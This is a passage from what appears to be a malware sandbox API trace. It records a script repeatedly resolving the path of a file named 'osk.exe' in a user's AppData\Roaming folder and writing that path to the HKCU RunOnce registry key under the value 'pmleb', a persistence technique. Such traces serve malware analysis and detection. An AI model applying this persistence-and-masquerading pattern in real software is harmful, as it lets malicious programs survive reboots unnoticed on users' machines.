[6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.877] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x17 [0080.877] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.877] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x18 [0080.877] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, 
pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.878] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x17 [0080.878] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.878] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.878] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.878] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.878] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.878] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.879] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.879] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, 
phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.879] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.879] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.879] RegCloseKey (hKey=0x280) returned 0x0 [0080.879] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.879] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.879] SetTimer (hWnd=0x20280, nIDEvent=0x2093, uElapse=0xa, lpTimerFunc=0x0) returned 0x2093 [0080.879] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.891] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.891] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.892] KillTimer (hWnd=0x20280, uIDEvent=0x2093) returned 1 [0080.892] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.892] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 
[0080.892] IUnknown:Release (This=0x787518) returned 0x1 [0080.892] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.892] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.892] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.892] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.892] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.892] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, 
Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.893] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.893] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.893] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.893] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x18 [0080.893] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.893] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x19 [0080.893] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), 
pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.894] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x18 [0080.894] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.894] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.894] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.894] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.894] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.894] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.894] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.894] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.894] WideCharToMultiByte (in: 
CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.895] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.895] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.895] RegCloseKey (hKey=0x280) returned 0x0 [0080.895] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.895] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.895] SetTimer (hWnd=0x20280, nIDEvent=0x2094, uElapse=0xa, lpTimerFunc=0x0) returned 0x2094 [0080.895] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.907] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.907] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.907] KillTimer (hWnd=0x20280, uIDEvent=0x2094) returned 1 [0080.908] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.908] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.908] IUnknown:Release (This=0x787518) returned 0x1 [0080.908] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, 
riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.908] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.908] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.908] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.908] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.908] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: 
ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.908] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.908] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.908] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.908] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x19 [0080.909] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.909] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1a [0080.909] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.909] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x19 [0080.910] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.910] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.910] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.910] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.910] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.910] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.910] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.910] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", 
cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.910] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.910] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.911] RegCloseKey (hKey=0x280) returned 0x0 [0080.911] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.911] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.911] SetTimer (hWnd=0x20280, nIDEvent=0x2095, uElapse=0xa, lpTimerFunc=0x0) returned 0x2095 [0080.911] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.923] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.923] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.924] KillTimer (hWnd=0x20280, uIDEvent=0x2095) returned 1 [0080.924] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.924] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.924] IUnknown:Release (This=0x787518) returned 0x1 [0080.924] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.924] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.924] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.924] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.924] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.925] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.925] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
